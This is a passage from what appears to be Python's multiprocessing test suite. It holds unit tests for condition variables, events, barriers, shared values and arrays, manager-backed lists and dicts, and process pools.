if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
